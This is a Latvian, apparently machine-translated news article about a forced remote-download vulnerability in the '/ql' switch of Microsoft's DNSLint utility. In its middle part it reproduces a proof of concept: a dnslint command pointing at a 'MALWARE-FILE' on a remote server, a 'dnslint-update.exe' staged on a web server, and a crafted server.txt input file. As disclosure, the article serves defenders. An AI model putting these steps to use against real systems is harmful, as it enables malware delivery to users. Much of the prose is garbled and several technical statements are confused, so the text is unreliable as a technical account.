Microsoft DNSLint Utility QL slēdzis varētu ļaut lejupielādēt attālos failus

Drošība / Microsoft DNSLint Utility QL slēdzis varētu ļaut lejupielādēt attālos failus 2 minūtes lasīts

Microsoft korporācija



Microsoft DNSLint lietderība darbojas, lai diagnosticētu domēna vārdu sistēmas (DNS) nosaukumu uzmeklēšanas problēmas, kas saistītas ar dažādiem tīmekļa serveriem piešķirtajām IP adresēm, kurām piekļūst caur pārlūku. Tas nav iekļauts kā daļa no Windows pamata pakotnes, bet to var bez maksas lejupielādēt no Microsoft vietnes. Attālās piekļuves ievainojamība kategorijā 7,6 (kritiska) CVSS 3.0 tika atklāts mērogs, kas ietekmēja šo lietderību, izraisot lejupielādes piespiedu disku.

Ievainojamība izriet no fakta, ka DNSLint nepārskata domēnu nosaukumus, analizējot DNS testa failus atbilstoši slēdzim “/ ql”. Gadījumā, ja galalietotājam izdodas izmantot šādu failu, kas satur skriptu vai bināro kodu, nevis tipiski paredzamo domēna vārda informāciju, sistēmu var pakļaut riskam, ja kļūst viegli izveidot piespiedu lejupielādes. Gadījumā, ja tas notiek, hakeris var pieprasīt piespiedu lejupielādi no ļaunprātīga faila, kas varētu lejupielādēt un izpildīt attālās komandas, kad piekļūstat, izmantojot tīmekļa pārlūkprogrammu. Lejupielāde saglabātu vietējās sistēmas atrašanās vietu un ātru piekļuvi drošībai, un, redzot, ka fails nāk no zināmas vietas diska diskā, lietotājs varētu būt sliecies ļaut izpildāmajam failam pāriet uz priekšu. Kad ļaunprātīgajam failam ir piešķirta privilēģija, tas var attālināti palaist jebkuru paredzēto kodu un apdraudēt lietotāja drošību un privātumu.



Džons Peidžs no hyp3rlinx ir uzrakstījis koncepcijas pierādījumu, kas imitē šo ievainojamību, paskaidrojot, ka neparedzētu failu var lejupielādēt, kā norādīts tālāk, ja tiek izmantots skripts vai binārā atsauces teksta fails, nevis domēna nosaukums:



dnslint.exe / v / y / d “MALWARE-FILE” / s X.X.X.X / r “myreport”



Lietotnes DNSLint kontekstā tālāk parādīts, kā ievainojamību varētu izmantot, lai sistēmā ieviestu ļaunprātīgu programmatūru.

1) “dnslint-update.exe” attālā tīmekļa servera saknes direktorijā.
2) “server.txt”
DNSLint
; Šis ir DNSLint ievades faila paraugs
+ Šo DNS serveri sauc: dns1.cp.msft.net
[dns ~ serveris] X.X.X.X
, a, r; Ieraksts
X.X.X.X, ptr, r; PTR ieraksts
test1, cname, r; CNAME ieraksts
test2, mx, r; MX ieraksts
3) dnslint.exe / ql server.txt

Iepriekš minētais kods netika modificēts, kā norādīts tiesības hyp3rlinx šim saturam. Atklājot šo ievainojamību, nešķiet, ka vēl būtu pieejams kāds plākstera atjauninājums, kas atrisinātu šo problēmu. Šai ievainojamībai joprojām ir jāpiešķir CVE kods, un Microsoft to ir jāidentificē un jāuzraksta oficiālajā drošības biļetenā par šo jautājumu.